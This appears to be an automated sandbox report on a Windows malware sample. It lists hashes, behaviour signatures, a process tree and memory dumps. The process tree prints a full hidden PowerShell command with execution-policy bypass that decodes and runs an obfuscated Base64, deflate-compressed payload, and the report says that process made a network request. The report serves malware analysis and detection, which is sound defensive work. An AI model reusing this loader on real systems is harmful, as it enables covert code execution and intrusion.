Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    12/10/2024, 15:30

General

  • Target

    3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe

  • Size

    126KB

  • MD5

    3ac5e263fa5670a50c4ad7060afc7e8f

  • SHA1

    7d00b96206ff3f1636812d016d504d43cea1a808

  • SHA256

    fcbe422cd0a036961659aabe2af0d909f07c3dcda9bffa3b8ccb54482614ab06

  • SHA512

    a773e6326dbbee1d37a1279ad0a5d12aee8259023378cbde18879ca66cc83acf20cfccd389ecdbe005793560a6f0ea8d8a05dda2dc32b03de8923c5c6060100d

  • SSDEEP

    3072:o/25jvDSgsqsb5Uh28vAbTV1WW69B9VjMdxPedN9ug0z9TBfFSFMHM:Dtzsb5Uh28+V1WW69B9VjMdxPedN9ug5

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1708
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\E2B1.tmp\E2B2.tmp\E2B3.bat C:\Users\Admin\AppData\Local\Temp\3ac5e263fa5670a50c4ad7060afc7e8f_JaffaCakes118.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe
        C:\Windows\syswow64\windowspowershell\v1.0\powershell.exe -NoP -Window Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"zVZNb9s4EL3rVxCGgEi1JFC2YrgxDDRpNt1gt25Qu92D4IMijW1uaFIgqcRK1v+9o1j+kJMtgh4WCx0ok29mnmbeDG2nZEg+tKz4kvPrZS6VcVp3oATwbifIOG+5U5IXt5ylRJvE4AIrg+fkWpgbo8h3pkyR8HPOZerUew8eKZgwZFWvZb0+uoNfjvNRQWJgssAl28Ypar/3HtlHrt8OYtc7VfTWByu+KA3E06k9mtxMVCL0kpmhF76L+oPDrZhOh3QVXgx2eA2pFNmxSXN3Z2ULeZ6moPXQniVcw2Ciyid7LNM7MMMRPPhfbv+G1JARmGCzq+vViQ/3zrNMoZerZMl4OT07w28BhYAHqe68+KX1pMwBYZdzlSyb5zdKGplKXiO+Zbk7qAkFH6UQyMY5KXSQS8kDYfJAqvmJF3a67iD+Llk23YLHIDLnMFXHgK+QAruHJmadJiZdPB3kxagC1gNbFWIiTcKHdHAl1W9JunDsa5HBijBBGhWJaBBE3an7tLfZvb3rnPbaGzv0OWNKmwlbwtA5yPVlJSDcdML3lHohPvT5ibcHfzCRVakxqetWmf/MOGebAmsn/oa570VTZx8zpJQicvyMGIxNoow/5gA58TXp0U3NkUCVl/9R0WtGb6z6Fr0pe1PuL0C70h/j9kG51OD8qhyOuu2tirDYjDj/nRSIT/YSJP4cUAzEl4rsPtclT5ap1KFx+h7wGpfawDJ4WWLixK+c/VQo5DWLhmDGBqfp8nXgkXImae5att5rJnzfCcJePwijKAi73ROP9GmfuuQfIgvji4LzAbFz/Lr4XKmkIreZ4NcCx7tIwWnd4lxteSRyEbhCIHrfySc/cvSI59Syyzf4iy+YQZb3oDAXFXOJWel20KdH3fZpFa3EMV05XF1cWQ8LxoE4GMHn5ufGWLSKSbtJtfTsx/YpKujf033Fk7lGbyMpwCVra4ZScGw2DJELw7hAouqt3cYISM5mFbutuyNGn8BUFxKKEG83vJSC3xORcXDRyg+na8s2aIu68KvCEX8Jy1tQlzBjghkmsYVS4o8SlGXrLya6nRbxBf7SeZICed65KkRaITXx80Rrs1BFVSBs0LOzxmVPPbsM/gQxNwuPrrrYALhE1LW2zL8WwmADBM+qlPkY1D1D8QefE6UXCa9KKPOyyiChWLfNNY1NtQq2aXddj+yCoP7Mtur1/4CqZe3VpnebimkM47or+72I0nrwrNfWDw==\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: CmdExeWriteProcessMemorySpam
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2652

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\E2B1.tmp\E2B2.tmp\E2B3.bat

          Filesize

          4KB

          MD5

          91f2bf2519a03ae2b1fb8ed1dcd7fe6c

          SHA1

          71958fbbdd32ebe90a813de7a80d238b0956df24

          SHA256

          245358e6950654bdaee53f96394007596841084bd7838c83342d69accd46850c

          SHA512

          26e3ecef9ef421e5b9e0b7057d3e73087db0eb5a52dacb36f883f3f89cf931a15a418325438bc20b87885380d4d9bb49a34a4d8a4f8c01ddf98c2a0a0263944d

        • memory/2652-4-0x0000000073941000-0x0000000073942000-memory.dmp

          Filesize

          4KB

        • memory/2652-5-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

        • memory/2652-6-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

        • memory/2652-8-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

        • memory/2652-7-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

        • memory/2652-9-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB

        • memory/2652-11-0x0000000073940000-0x0000000073EEB000-memory.dmp

          Filesize

          5.7MB